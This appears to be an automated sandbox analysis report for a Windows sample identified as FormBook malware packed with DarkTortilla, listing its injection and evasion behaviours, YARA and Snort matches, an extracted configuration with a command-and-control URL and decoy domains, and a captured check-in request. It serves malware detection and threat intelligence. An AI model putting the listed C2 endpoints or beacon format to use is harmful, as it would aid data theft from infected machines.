Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
yaM8XR1HfL.exe

Overview

General Information

Sample name:yaM8XR1HfL.exe
renamed because original name is a hash value
Original sample name:148da9a63f027b2e7625f0b82b42bc795737b55c46d040af508fdcea2bccad98.exe
Analysis ID:1465386
MD5:64a5e155baded9185ecd1fa9946c13aa
SHA1:4e7c62d7d5b1353bfc0e0220ae89e5409201bc70
SHA256:148da9a63f027b2e7625f0b82b42bc795737b55c46d040af508fdcea2bccad98
Tags:exe
Infos:

Detection

DarkTortilla, FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected DarkTortilla Crypter
Yara detected FormBook
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • yaM8XR1HfL.exe (PID: 5160 cmdline: "C:\Users\user\Desktop\yaM8XR1HfL.exe" MD5: 64A5E155BADED9185ECD1FA9946C13AA)
    • yaM8XR1HfL.exe (PID: 1288 cmdline: "C:\Users\user\Desktop\yaM8XR1HfL.exe" MD5: 64A5E155BADED9185ECD1FA9946C13AA)
    • yaM8XR1HfL.exe (PID: 7064 cmdline: "C:\Users\user\Desktop\yaM8XR1HfL.exe" MD5: 64A5E155BADED9185ECD1FA9946C13AA)
      • explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • WWAHost.exe (PID: 4424 cmdline: "C:\Windows\SysWOW64\WWAHost.exe" MD5: 7C7EDAD5BDA9C34FD50C3A58429C90F0)
          • cmd.exe (PID: 768 cmdline: /c del "C:\Users\user\Desktop\yaM8XR1HfL.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 5428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DarkTortillaDarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging.From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla
NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.liamcollinai.com/na10/"], "decoy": ["tetheus.com", "ventlikeyoumeanit.com", "tintbliss.com", "rinabet357.com", "sapphireboutiqueusa.com", "abc8bet6.com", "xzcn3i7jb13cqei.buzz", "pinktravelsnagpur.com", "bt365038.com", "rtpbossujang303.shop", "osthirmaker.com", "thelonelyteacup.com", "rlc2019.com", "couverture-charpente.com", "productivagc.com", "defendercarcare.com", "abcentixdigital.com", "petco.ltd", "oypivh.top", "micro.guru", "hokivegasslots.club", "5663876.com", "symboleffekt.info", "tworiverlabsintake.com", "pegaso.store", "sasoera.com", "material.chat", "taniamckirdy.com", "dansistosproductions.com", "moromorojp.com", "z27e1thx976ez3u.buzz", "skinrenue.com", "nbvci.xyz", "jakobniinja.xyz", "snykee.com", "sl24.top", "wawturkiye.xyz", "virtualeventsbyelaine.com", "giorgiaclerico.com", "d9psk8.xyz", "hard-to-miss.space", "awclog.com", "topcomparativos.com", "somoyboutique.com", "findlove.pro", "zbo170.app", "dexcoenergy.com", "nona23.lat", "ingelset.com", "hexatelier.com", "nftees.tech", "visionarymaterialsinstitute.com", "khanyos.com", "bz59.top", "migraine-treatment-28778.bond", "catboxbot.online", "kkugames.com", "llmsearchoptimization.com", "fipbhvvb.xyz", "vmytzptc.xyz", "intermediafx.shop", "lhrrs.com", "grimreapervalley.com", "discount-fess.space"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18849:$sqlite3step: 68 34 1C 7B E1
      • 0x1895c:$sqlite3step: 68 34 1C 7B E1
      • 0x18878:$sqlite3text: 68 38 2A 90 C5
      • 0x1899d:$sqlite3text: 68 38 2A 90 C5
      • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 39 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.yaM8XR1HfL.exe.170000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.2.yaM8XR1HfL.exe.170000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          3.2.yaM8XR1HfL.exe.170000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          3.2.yaM8XR1HfL.exe.170000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          3.2.yaM8XR1HfL.exe.170000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x17a49:$sqlite3step: 68 34 1C 7B E1
          • 0x17b5c:$sqlite3step: 68 34 1C 7B E1
          • 0x17a78:$sqlite3text: 68 38 2A 90 C5
          • 0x17b9d:$sqlite3text: 68 38 2A 90 C5
          • 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 9 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:07/01/24-15:55:50.915978
          SID:2031412
          Source Port:49718
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus detection for URL or domain
          Source: http://www.nona23.lat/na10/www.giorgiaclerico.comAvira URL Cloud: Label: malware
          Source: http://www.productivagc.com/na10/www.dexcoenergy.comAvira URL Cloud: Label: malware
          Source: http://www.nona23.lat/na10/Avira URL Cloud: Label: malware
          Found malware configuration
          Source: 00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.liamcollinai.com/na10/"], "decoy": ["tetheus.com", "ventlikeyoumeanit.com", "tintbliss.com", "rinabet357.com", "sapphireboutiqueusa.com", "abc8bet6.com", "xzcn3i7jb13cqei.buzz", "pinktravelsnagpur.com", "bt365038.com", "rtpbossujang303.shop", "osthirmaker.com", "thelonelyteacup.com", "rlc2019.com", "couverture-charpente.com", "productivagc.com", "defendercarcare.com", "abcentixdigital.com", "petco.ltd", "oypivh.top", "micro.guru", "hokivegasslots.club", "5663876.com", "symboleffekt.info", "tworiverlabsintake.com", "pegaso.store", "sasoera.com", "material.chat", "taniamckirdy.com", "dansistosproductions.com", "moromorojp.com", "z27e1thx976ez3u.buzz", "skinrenue.com", "nbvci.xyz", "jakobniinja.xyz", "snykee.com", "sl24.top", "wawturkiye.xyz", "virtualeventsbyelaine.com", "giorgiaclerico.com", "d9psk8.xyz", "hard-to-miss.space", "awclog.com", "topcomparativos.com", "somoyboutique.com", "findlove.pro", "zbo170.app", "dexcoenergy.com", "nona23.lat", "ingelset.com", "hexatelier.com", "nftees.tech", "visionarymaterialsinstitute.com", "khanyos.com", "bz59.top", "migraine-treatment-28778.bond", "catboxbot.online", "kkugames.com", "llmsearchoptimization.com", "fipbhvvb.xyz", "vmytzptc.xyz", "intermediafx.shop", "lhrrs.com", "grimreapervalley.com", "discount-fess.space"]}
          Multi AV Scanner detection for submitted file
          Source: yaM8XR1HfL.exeReversingLabs: Detection: 68%
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.yaM8XR1HfL.exe.170000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.yaM8XR1HfL.exe.170000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.3293705074.0000000003590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.3293484305.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2503045630.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.3293202646.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2503045630.00000000038E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Machine Learning detection for sample
          Source: yaM8XR1HfL.exeJoe Sandbox ML: detected
          Source: yaM8XR1HfL.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: WWAHost.pdb source: yaM8XR1HfL.exe, 00000004.00000002.2550784274.0000000003090000.00000040.10000000.00040000.00000000.sdmp, WWAHost.exe, WWAHost.exe, 00000009.00000002.3292650503.0000000000120000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: WWAHost.pdbUGP source: yaM8XR1HfL.exe, 00000004.00000002.2550784274.0000000003090000.00000040.10000000.00040000.00000000.sdmp, WWAHost.exe, 00000009.00000002.3292650503.0000000000120000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: yaM8XR1HfL.exe, 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, WWAHost.exe, 00000009.00000003.2551493393.0000000003EAA000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000009.00000003.2549750723.0000000003CF7000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000009.00000002.3295685755.00000000041EE000.00000040.00001000.00020000.00000000.sdmp, WWAHost.exe, 00000009.00000002.3295685755.0000000004050000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: yaM8XR1HfL.exe, yaM8XR1HfL.exe, 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, WWAHost.exe, WWAHost.exe, 00000009.00000003.2551493393.0000000003EAA000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000009.00000003.2549750723.0000000003CF7000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000009.00000002.3295685755.00000000041EE000.00000040.00001000.00020000.00000000.sdmp, WWAHost.exe, 00000009.00000002.3295685755.0000000004050000.00000040.00001000.00020000.00000000.sdmp
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 9_2_0017212C memset,FindFirstFileW,FindClose,9_2_0017212C

          Networking

          barindex
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49718 -> 217.160.0.1:80
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.liamcollinai.com/na10/
          Source: global trafficHTTP traffic detected: GET /na10/?y2=vxBAV4x3qjJKkl3AB8S3aH8FdY2weIJ3+CekvXUcdu0/pCH7SUv9XlMLgROraoBr2jfW&DV=lbC06h HTTP/1.1Host: www.nftees.techConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 217.160.0.1 217.160.0.1
          Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Windows\explorer.exeCode function: 7_2_09258F82 getaddrinfo,setsockopt,recv,7_2_09258F82
          Source: global trafficHTTP traffic detected: GET /na10/?y2=vxBAV4x3qjJKkl3AB8S3aH8FdY2weIJ3+CekvXUcdu0/pCH7SUv9XlMLgROraoBr2jfW&DV=lbC06h HTTP/1.1Host: www.nftees.techConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficDNS traffic detected: DNS query: www.osthirmaker.com
          Source: global trafficDNS traffic detected: DNS query: www.nftees.tech
          Source: explorer.exe, 00000007.00000002.3302042587.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3302042587.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: explorer.exe, 00000007.00000000.2496782788.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3292908189.0000000000F13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
          Source: explorer.exe, 00000007.00000002.3302042587.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3302042587.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: explorer.exe, 00000007.00000002.3302042587.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3302042587.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: yaM8XR1HfL.exe, 00000000.00000002.2508647443.0000000005F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://iptc.org/std/Iptc4xmde
          Source: yaM8XR1HfL.exe, 00000000.00000002.2508647443.0000000005F43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.
          Source: explorer.exe, 00000007.00000002.3302042587.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3302042587.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: explorer.exe, 00000007.00000002.3302042587.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
          Source: explorer.exe, 00000007.00000000.2501022529.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2501770890.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.3301294769.0000000008870000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.abc8bet6.com
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.abc8bet6.com/na10/
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.abc8bet6.com/na10/www.productivagc.com
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.abc8bet6.comReferer:
          Source: explorer.exe, 00000007.00000000.2509419071.000000000C81C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2652534535.000000000C861000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2509419071.000000000C861000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3306031223.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.awclog.com
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.awclog.com/na10/
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.awclog.com/na10/www.sasoera.com
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.awclog.comReferer:
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bz59.top
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bz59.top/na10/
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bz59.top/na10/www.jakobniinja.xyz
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bz59.topReferer:
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dexcoenergy.com
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dexcoenergy.com/na10/
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dexcoenergy.com/na10/www.hokivegasslots.club
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dexcoenergy.comReferer:
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.giorgiaclerico.com
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.giorgiaclerico.com/na10/
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.giorgiaclerico.com/na10/www.bz59.top
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.giorgiaclerico.comReferer:
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hokivegasslots.club
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hokivegasslots.club/na10/
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hokivegasslots.club/na10/www.thelonelyteacup.com
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hokivegasslots.clubReferer:
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jakobniinja.xyz
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jakobniinja.xyz/na10/
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jakobniinja.xyz/na10/e
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jakobniinja.xyzReferer:
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.liamcollinai.com
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.liamcollinai.com/na10/
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.liamcollinai.com/na10/www.nona23.lat
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.liamcollinai.comReferer:
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nbvci.xyz
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nbvci.xyz/na10/
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nbvci.xyz/na10/www.abc8bet6.com
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nbvci.xyzReferer:
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nftees.tech
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nftees.tech/na10/
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nftees.tech/na10/www.nbvci.xyz
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nftees.techReferer:
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nona23.lat
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nona23.lat/na10/
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nona23.lat/na10/www.giorgiaclerico.com
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nona23.latReferer:
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.osthirmaker.com
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.osthirmaker.com/na10/
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.osthirmaker.com/na10/www.nftees.tech
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.osthirmaker.comReferer:
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.productivagc.com
          Source: explorer.exe, 00000007.00000002.3302850140.0000000009B7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.productivagc.com/na10/
